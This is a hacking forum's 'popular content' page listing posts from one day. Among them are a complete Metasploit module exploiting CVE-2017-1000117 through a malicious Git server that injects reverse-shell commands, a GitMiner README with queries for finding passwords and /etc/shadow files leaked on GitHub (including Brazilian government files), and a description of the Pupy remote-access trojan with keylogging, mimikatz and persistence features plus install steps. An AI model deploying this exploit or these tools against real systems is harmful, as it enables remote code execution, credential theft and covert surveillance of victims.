Leaderboard

Popular Content

Showing content with the highest reputation on 09/02/17 in all areas

  1. The dictionary was created between 2013 and 2016. Download: https://mega.nz/#!HEQAnIYA!k-igkydxW_zeKMvAVLZEWOEVQM5JcXUVb0dmiOvxL3w
    2 points
  2. Presented at Blackhat Asia 2016.
     More info - Instrumentation Techniques and ROP Exploit Rapid Analysis
     PDF: http://blackhat.com/docs/asia-16/materials/arsenal/asia-16-Li-StackPivotChecker.pdf
     Download: http://blackhat.com/docs/asia-16/materials/arsenal/asia-16-Li-StackPivotChecker-tool.zip
    2 points
  3. Success with another motherboard. The screws were inserted incorrectly.
    2 points
  4. https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-caliskan-islam.pdf
    1 point
  5. http://scaneye.net/ In the past there was also this service; I don't know whether it still works.
    1 point
  6. Requested, delivered, paid in less than 5 minutes. I recommend.
    1 point
  7. Man, it was simple, but I'm the stupid one. At first I was overcomplicating things by trying to insert another query into the par parameter, but there was no point because of the quotes. You have a PM, thanks for the challenge.
    1 point
  8. EDB-ID: 42599
     Author: Metasploit
     Published: 2017-08-31
     CVE: CVE-2017-1000117
     Type: Remote
     Platform: Python
     Aliases: N/A
     Tags: Metasploit Framework
     Vulnerable App: N/A

     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HttpServer

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117',
             'Description' => %q(
               This module exploits CVE-2017-1000117, which affects Git
               version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed
               parameters from the username incorrectly. This can be used to inject
               commands to the operating system when the submodule is cloned.

               This module creates a fake git repository which contains a submodule
               containing the vulnerability. The vulnerability is triggered when the
               submodules are initialised.
             ),
             'License' => MSF_LICENSE,
             'References' =>
               [
                 ['CVE', '2017-1000117'],
                 ['URL', 'http://seclists.org/oss-sec/2017/q3/280' ]
               ],
             'DisclosureDate' => 'Aug 10 2017',
             'Targets' =>
               [
                 [
                   'Automatic',
                   {
                     'Platform' => [ 'unix' ],
                     'Arch' => ARCH_CMD,
                     'Payload' =>
                       {
                         'Compat' =>
                           {
                             'PayloadType' => 'python'
                           }
                       }
                   }
                 ]
               ],
             'DefaultOptions' =>
               {
                 'Payload' => 'cmd/unix/reverse_python'
               },
             'DefaultTarget' => 0
           )
         )

         register_options(
           [
             OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
             OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])
           ]
         )
       end

       def setup
         @repo_data = {
           git: { files: {} }
         }
         setup_git
         super
       end

       def setup_git
         # URI must start with a /
         unless git_uri && git_uri =~ /^\//
           fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
         end

         payload_cmd = payload.encoded + " &"
         payload_cmd = Rex::Text.to_hex(payload_cmd, '%')

         submodule_path = datastore['GIT_SUBMODULE']
         if submodule_path.blank?
           submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase
         end

         gitmodules = "[submodule \"#{submodule_path}\"]
     path = #{submodule_path}
     url = ssh://-oProxyCommand=#{payload_cmd}/
     "
         sha1, content = build_object('blob', gitmodules)
         @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content

         tree = "100644 .gitmodules\0#{[sha1].pack('H*')}"
         tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}"
         sha1, content = build_object('tree', tree)
         @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content

         ## build the supposed commit that dropped this file, which has a random user/company
         email = Rex::Text.rand_mail_address
         first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
         full_name = "#{first.capitalize} #{last.capitalize}"
         tstamp = Time.now.to_i
         author_time = rand(tstamp)
         commit_time = rand(author_time)
         tz_off = rand(10)
         commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
           "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
           "\n" \
           "Initial commit to open git repository for #{company}!\n"

         sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
         @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
         @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
         @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
       end

       # Build's a Git object
       def build_object(type, content)
         # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
         header = "#{type} #{content.size}\0"
         store = header + content
         [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
       end

       # Returns the Git object path name that a file with the provided SHA1 will reside in
       def get_path(sha1)
         sha1[0...2] + '/' + sha1[2..40]
       end

       def exploit
         super
       end

       def primer
         # add the git and mercurial URIs as necessary
         hardcoded_uripath(git_uri)
         print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
       end

       # handles routing any request to the mock git, mercurial or simple HTML as necessary
       def on_request_uri(cli, req)
         # if the URI is one of our repositories and the user-agent is that of git/mercurial
         # send back the appropriate data, otherwise just show the HTML version
         user_agent = req.headers['User-Agent']
         if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
           do_git(cli, req)
           return
         end

         do_html(cli, req)
       end

       # simulates a Git HTTP server
       def do_git(cli, req)
         # determine if the requested file is something we know how to serve from our
         # fake repository and send it if so
         req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
         if @repo_data[:git][:files].key?(req_file)
           vprint_status("Sending Git #{req_file}")
           send_response(cli, @repo_data[:git][:files][req_file])
         else
           vprint_status("Git #{req_file} doesn't exist")
           send_not_found(cli)
         end
       end

       # simulates an HTTP server with simple HTML content that lists the fake
       # repositories available for cloning
       def do_html(cli, _req)
         resp = create_response
         resp.body = <<HTML
          <html>
           <head><title>Public Repositories</title></head>
           <body>
             <p>Here are our public repositories:</p>
             <ul>
     HTML
         this_git_uri = URI.parse(get_uri).merge(git_uri)
         resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
         resp.body << <<HTML
             </ul>
           </body>
         </html>
     HTML

         cli.send_response(resp)
       end

       # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
       def git_uri
         return @git_uri if @git_uri
         if datastore['GIT_URI'].blank?
           @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
         else
           @git_uri = datastore['GIT_URI']
         end
       end
     end

     Source: https://www.exploit-db.com/exploits/42599/
    1 point
  9. + Author: Danilo Vaz a.k.a. UNK
     + Blog: http://unk-br.blogspot.com
     + Github: http://github.com/danilovazb
     + Twitter: https://twitter.com/danilovaz_unk

     WARNING
     +---------------------------------------------------+
     | DEVELOPERS ASSUME NO LIABILITY AND ARE NOT        |
     | RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY    |
     | THIS PROGRAM                                      |
     +---------------------------------------------------+

     Description
     Advanced search tool and automation in Github. This tool aims to facilitate research by code or code snippets on github through the site's search page.

     Motivation
     Demonstrates the fragility of trust in public repositories to store codes with sensitive information.

     Requirements
     lxml
     requests

     Install:
     git clone http://github.com/danilovazb/GitMiner
     sudo apt-get install python-requests python-lxml
     OR
     pip install -r requirements.txt

     Help:
     usage:
       v1.1 Automatic search for GitHub.

       + Autor: Danilo Vaz a.k.a. UNK
       + Blog: http://unk-br.blogspot.com
       + Github: http://github.com/danilovazb
       + Gr33tz: l33t0s, RTFM

       +[WARNING]------------------------------------------+
       | THIS TOOL IS THE PENALTY FOR EDUCATIONAL USE,     |
       | THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE TO   |
       | THE TOOL THAT USE.                                |
       +---------------------------------------------------+

       [-h] [-q 'filename:shadown path:etc'] [-m wordpress] [-o result.txt]

     optional arguments:
       -h, --help            show this help message and exit
       -q 'filename:shadown path:etc', --query 'filename:shadown path:etc'
                             Specify search term
       -m wordpress, --module wordpress
                             Specify the search module
       -o result.txt, --output result.txt
                             Specify the output file where it will be saved

     Example:
     Searching for wordpress configuration files with passwords:
     $:> python git_miner.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -o result.txt

     Looking for Brazilian government files containing passwords:
     $:> python git_miner.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas

     Looking for shadow files on the etc paste:
     $:> python git_miner.py --query 'filename:shadow path:etc' -m root

     Searching for joomla configuration files with passwords:
     $:> python git_miner.py --query 'filename:configuration extension:php "public password" in:file' -m joomla

     Hacking SSH Servers:

     Download: GitMiner-master.zip
     Source: https://github.com/UnkL4b/GitMiner
    1 point
  10. Material
      Introduction
      Section 1) Fundamentals
      Section 2) Malware Techniques
      Section 3) RE Tools
      Section 4) Triage Analysis
      Section 5) Static Analysis
      Section 6) Dynamic Analysis
      Source: https://securedorg.github.io/RE101/
    1 point
  11. Pupy
      Pupy is an open-source, multi-platform (Windows, Linux, OSX, Android) tool. It is a RAT (remote administration tool) and a post-exploitation tool. It is written mainly in Python. Pupy modules can transparently access remote Python objects using rpyc to perform various interactive tasks. Pupy can generate payloads in several formats, such as PE executables, DLLs, pure Python files, PowerShell, apk, ...
      - Choose a launcher (connect, bind...), a transport (ssl, http, rsa, obfs3, scramblesuit, ...) and a number of "scriptlets". Scriptlets are scripts meant to be embedded in order to perform various tasks offline (without requiring a session), such as adding persistence, starting a keylogger, or detecting a sandbox.

      Features
      - On Windows, Pupy is compiled as a DLL and is loaded in memory.
      - It can reflectively migrate into other processes.
      - It can remotely import, from memory, pure Python packages (.py, .pyc) and Python C (.pyd).
      - Pupy is easily extensible; it uses [rpyc].
      - Pupy can also communicate using obfsproxy. All non-interactive modules can be dispatched to multiple hosts in a single command.
      - Multi-platform (tested on Win 7, 8, 10, Kali Linux, Ubuntu, OSX, Android)
      - In several formats: exe (x86, x64), dll (x86, x64), Python, apk, ...

      Transport
      - rsa - A layer with authentication and encryption using RSA and AES256, often with other layers stacked on top.
      - A layer using a static AES256 key
      - ssl (default)
      - http
      - obfs3 - with the help of the rsa layer for better security.
      - etc.

      Windows Specific
      - migrate
      - works very well with [mimikatz]
      - screenshot
      - microphone recording
      - keylogger
      - keyboard recording
      - screenshots on every click
      - etc.

      Screenshots
      https://github.com/n1nj4sec/pupy/wiki/Screenshots

      Install
      git clone https://github.com/n1nj4sec/pupy.git pupy
      cd pupy
      git submodule update --init --depth 1 pupy/payload_templates
      git submodule init
      git submodule update
      pip install -r requirements.txt
    1 point